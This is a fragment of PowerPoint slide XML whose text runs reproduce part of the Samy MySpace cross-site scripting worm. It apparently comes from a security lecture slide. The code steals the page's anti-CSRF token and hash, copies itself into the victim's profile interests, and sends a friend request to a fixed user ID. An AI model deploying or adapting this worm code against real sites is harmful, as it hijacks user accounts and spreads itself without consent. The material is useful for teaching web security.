                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AG.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(61,AG.length);if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AG.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>')==-1){if(AF){AG+=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AF;var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> AR=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');var AS=new</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Array();AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>interestLabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>']='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>heroes';AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>['submit']='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Preview';AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>['interest']=AG;J=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getXMLObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>httpSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuseaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>profile.previewInterests&amp;Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+AR,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>postHero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,'POST',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>paramsToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AS))}}}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>postHero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!=4){return}var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AU=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.responseText;var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> AR=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');var AS=new</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Array();AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>interestLabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>']='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>heroes';AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>['submit']='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Submit';AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>['interest']=AG;AS['hash']=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getHiddenParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AU,'hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>httpSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuseaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>profile.processInterests&amp;Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+AR,nothing,'POST',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>paramsToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AS))}function main(){var AN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getClientFID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();var BH='/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuseaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user.viewProfile&amp;friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+AN+'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+L;J=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getXMLObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>httpSend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BH,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,'GET');xmlhttp2=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getXMLObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>();httpSend2('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuseaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>invite.addfriend_verify&amp;friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=11851658&amp;Mytoken='+L,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>processxForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,'GET')}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>processxForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){if(xmlhttp2.readyState!=4){return}var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AU=xmlhttp2.responseText;var AQ=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getHiddenParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hashcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');var AR=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');var AS=new</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Array();AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hashcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>']=AQ;AS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>friendID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
